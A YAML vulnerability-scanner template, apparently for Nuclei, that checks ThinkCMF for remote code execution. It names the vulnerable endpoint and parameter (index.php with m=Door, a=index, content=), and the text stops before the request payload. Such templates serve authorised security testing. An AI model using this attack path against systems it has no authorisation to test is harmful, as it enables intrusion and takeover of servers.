id: thinkcmf-arbitrary-code-execution

info:
  name: ThinkCMF - Remote Code Execution
  author: pikpikcu
  severity: high
  description: ThinkCMF is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://www.shuzhiduo.com/A/l1dygr36Je/
  metadata:
    max-request: 1
  tags: thinkcmf,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=